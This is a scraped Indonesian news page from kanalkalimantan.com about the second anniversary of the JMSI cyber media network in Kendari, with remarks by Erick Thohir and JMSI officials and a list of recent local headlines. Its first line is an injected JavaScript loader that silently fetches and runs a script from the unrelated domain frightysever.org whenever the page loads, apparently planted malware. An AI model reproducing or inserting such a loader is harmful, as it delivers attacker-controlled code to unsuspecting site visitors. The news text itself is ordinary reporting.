(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
NASIONAL

HUT ke-2 JMSI, Hadir Menjaga Marwah Pers di Tanah Air


KANALKALIMANTAN.COM, KENDARI – Menteri BUMN, Erick Thohir, mengharapkan media harus menjadi pilar demokrasi dalam sistem politik Indonesia.

Selain itu, kata dia, juga sebagai upaya penguatan civil society atau kontrol sosial.
“Media harus mampu mendidik bangsa supaya punya kultur yang tangguh,” kata Erick Thohir, saat memberikan pemaparan soal program transformasi energi di acara Hari Ulang Tahun (HUT) ke-2 JMSI (Jaringan Media Siber Indonesia), di Kendari, Selasa (8/2/2022).

Di sisi lain, kata Erick Thohir, media dipastikan dapat menghindra berita hoax alias berita bohong. Karena saat cukup beredar berita bohong dan pola pemikiran masyarakat terpengaruhi.

Mengusung tema “Mengarusutamakan media siber sebagai pengawal agenda strategis nasional dari antikorupsi hingga transformasi energi” seminar nasional digelar JMSI, di Plaza Kubra Kendari, Sulawesi Tenggara.

 

Baca juga : Perkara Sebilah Belati Maserani Dibawa Polisi

Rangkaian kegiatan HUT ke-2 JMSI ini mendaulat Ketua Komisi Pemberantasan Korupsi (KPK), Firli Bahuri dan Menteri BUMN, Erick Thohir sebagai pembicara via virtual.

HUT ke-2 JMSI ini juga ada dari Pengurus HIPMI Pusat, Anggawira, Ketua Komite Tetap Energi Terbarukan dan Gerakan Net Zero Kadin, Muhammad Yusrizki, serta Kadiv Humas Polri, Irjen Pol Dedi Prasetyo.
Sekretaris JMSI, Mahmud Marhaba mengatakan, JMSI hadir untuk menjaga marwah pers di Tanah Air.

“JMSI baru 2 tahun, tujuannya bagaimana kehadiran JMSI bisa menjaga marwah pers di Tanah Air. Ada banyak wartawan, ada banyak media, dan profesi wartawan tumbuh dengan banyak, bahkan ada 40.000 tumbuh di kabupaten kota se Indonesia,” bebernya.

Tokoh pers asal Gorontalo ini mengetakan, ada yang tercecer dan tak terjangkau. Tentunya JMSI punya tanggung jawab untuk melakukan pembinaan agar mereka menjadi profesional.

 

Baca juga : Ketua DPRD Banjarbaru Vaksinasi Booster

“Jadi kami dari JMSI mau membina menjadikan media profesional, agar tak disebut abal-abal. Itulah motivasi kami,” tuturnya.

Selain pengurus JMSI se Indonesia, juga hadir menyaksikan kemeriahan HUT JMSI, Ketua JMSI Kalsel Milhan Rusli, Sekretaris JMSI Kalsel, SA Lingga dan Ketua Bidang Pendataan dan Verifikasi JMSI Kalsel, Anshari Yannoor.

HUT ke-2 JMSI ini berlangsung bersamaan dengan rangkaian peringatan Hari Pers Nasional (HPN) 2022 di Kendari. (kanalkalimantan.com/al)

Reporter : al
Editor : kk

 


Desy Arfianty

Recent Posts

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

16 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

36 menit ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

4 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

5 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

5 jam ago

This website uses cookies.